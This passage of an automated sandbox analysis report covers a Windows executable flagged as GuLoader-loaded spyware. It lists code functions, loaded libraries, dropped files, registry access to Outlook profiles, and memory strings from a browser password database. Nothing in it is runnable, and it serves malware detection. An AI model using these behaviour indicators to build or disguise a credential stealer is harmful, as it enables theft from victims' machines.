            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FC54F4_2_065FC54F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F0D484_2_065F0D48
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FE5404_2_065FE540
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FA5704_2_065FA570
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FC5604_2_065FC560
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FE9D04_2_065FE9D0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F15F84_2_065F15F8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FC9F04_2_065FC9F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FA9F04_2_065FA9F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F15E84_2_065F15E8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FE9E04_2_065FE9E0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FC9E04_2_065FC9E0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F11904_2_065F1190
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F11A04_2_065F11A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06633B584_2_06633B58
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06634B204_2_06634B20
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066371604_2_06637160
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066344674_2_06634467
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663596A4_2_0663596A
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663C7694_2_0663C769
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06631B684_2_06631B68
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06639C684_2_06639C68
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663F2684_2_0663F268
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663C7704_2_0663C770
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066384704_2_06638470
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066324774_2_06632477
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066344784_2_06634478
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066359784_2_06635978
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663F2784_2_0663F278
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663AF784_2_0663AF78
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663DA7F4_2_0663DA7F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663B4424_2_0663B442
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066300404_2_06630040
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06635E404_2_06635E40
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663F7404_2_0663F740
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066312484_2_06631248
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066389484_2_06638948
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06633B484_2_06633B48
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663DF484_2_0663DF48
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663B4504_2_0663B450
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066371504_2_06637150
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06639C5A4_2_06639C5A
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663DF584_2_0663DF58
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06631B584_2_06631B58
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663E4204_2_0663E420
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663CC274_2_0663CC27
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663322A4_2_0663322A
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066309284_2_06630928
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066376284_2_06637628
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06635E2F4_2_06635E2F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663F72F4_2_0663F72F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663A1304_2_0663A130
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066312374_2_06631237
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066389374_2_06638937
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066332384_2_06633238
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663CC384_2_0663CC38
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663D1004_2_0663D100
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06638E004_2_06638E00
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066300074_2_06630007
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663B9074_2_0663B907
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066363084_2_06636308
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663FC084_2_0663FC08
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066329084_2_06632908
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663E4124_2_0663E412
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06638E104_2_06638E10
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066329184_2_06632918
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663B9184_2_0663B918
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066309184_2_06630918
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066376184_2_06637618
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663A11F4_2_0663A11F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06634B1D4_2_06634B1D
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06637AE14_2_06637AE1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663BDE04_2_0663BDE0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06633FE84_2_06633FE8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06634FE84_2_06634FE8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663E8E84_2_0663E8E8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06631FE84_2_06631FE8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663A5E84_2_0663A5E8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06637AF04_2_06637AF0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663D0F04_2_0663D0F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066362FA4_2_066362FA
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06631FF84_2_06631FF8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663A5F84_2_0663A5F8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663AAC04_2_0663AAC0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066392C74_2_066392C7
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066316CA4_2_066316CA
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066336C84_2_066336C8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663D5C84_2_0663D5C8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066367D04_2_066367D0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663BDD04_2_0663BDD0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06634FD74_2_06634FD7
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663E8D94_2_0663E8D9
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066316D84_2_066316D8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066392D84_2_066392D8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06633FD84_2_06633FD8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066354A14_2_066354A1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066397A04_2_066397A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06637FA74_2_06637FA7
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06630DA94_2_06630DA9
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06632DA84_2_06632DA8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663C2A84_2_0663C2A8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066354B04_2_066354B0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663EDB04_2_0663EDB0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663AAB04_2_0663AAB0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663D5B74_2_0663D5B7
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066336BA4_2_066336BA
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06630DB84_2_06630DB8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06637FB84_2_06637FB8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066367BF4_2_066367BF
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066384804_2_06638480
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066304894_2_06630489
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066324884_2_06632488
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663AF884_2_0663AF88
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06636C884_2_06636C88
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663DA904_2_0663DA90
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663C2974_2_0663C297
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06632D9A4_2_06632D9A
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663979A4_2_0663979A
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066304984_2_06630498
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06636C984_2_06636C98
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663ED9F4_2_0663ED9F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0665BE104_2_0665BE10
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066557C04_2_066557C0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0665F5A04_2_0665F5A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06654E604_2_06654E60
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06651C604_2_06651C60
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066532404_2_06653240
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066500404_2_06650040
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066548204_2_06654820
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066516204_2_06651620
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0665F2284_2_0665F228
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06652C004_2_06652C00
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066548104_2_06654810
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0665F2184_2_0665F218
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066528E04_2_066528E0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06653EC04_2_06653EC0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06650CC04_2_06650CC0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066554A04_2_066554A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: String function: 00402C5E appears 52 times
            Source: OeM750ajqm.exe, 00000003.00000002.1448370481.0000000000437000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamegaveafgifternes atrocities.exeDVarFileInfo$ vs OeM750ajqm.exe
            Source: OeM750ajqm.exe, 00000004.00000002.2555581855.0000000036B67000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs OeM750ajqm.exe
            Source: OeM750ajqm.exe, 00000004.00000002.2525482896.0000000000437000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamegaveafgifternes atrocities.exeDVarFileInfo$ vs OeM750ajqm.exe
            Source: OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs OeM750ajqm.exe
            Source: OeM750ajqm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/25@5/5
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034F1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004034F1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_004048F0 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,3_2_004048F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_00402198 CoCreateInstance,MultiByteToWideChar,3_2_00402198
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile created: C:\Program Files (x86)\skjaldedigtningen.iniJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile created: C:\Users\user\afsvampningJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeMutant created: NULL
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile created: C:\Users\user\AppData\Local\Temp\nsk6AFA.tmpJump to behavior
            Source: OeM750ajqm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036EDE000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036EEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: OeM750ajqm.exeVirustotal: Detection: 58%
            Source: OeM750ajqm.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile read: C:\Users\user\Desktop\OeM750ajqm.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\OeM750ajqm.exe "C:\Users\user\Desktop\OeM750ajqm.exe"
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess created: C:\Users\user\Desktop\OeM750ajqm.exe "C:\Users\user\Desktop\OeM750ajqm.exe"
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess created: C:\Users\user\Desktop\OeM750ajqm.exe "C:\Users\user\Desktop\OeM750ajqm.exe"Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: OeM750ajqm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000003.00000002.1450395666.000000000731A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_6D6C1B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,3_2_6D6C1B28
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06529C30 push esp; retf 0654h4_2_06529D55
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06528C2F pushfd ; iretd 4_2_06528C30
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06528DDF push esp; iretd 4_2_06528DE0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065268F1 push es; ret 4_2_06526900
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652891E pushad ; iretd 4_2_0652891F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile created: C:\Users\user\AppData\Local\Temp\nst74DF.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
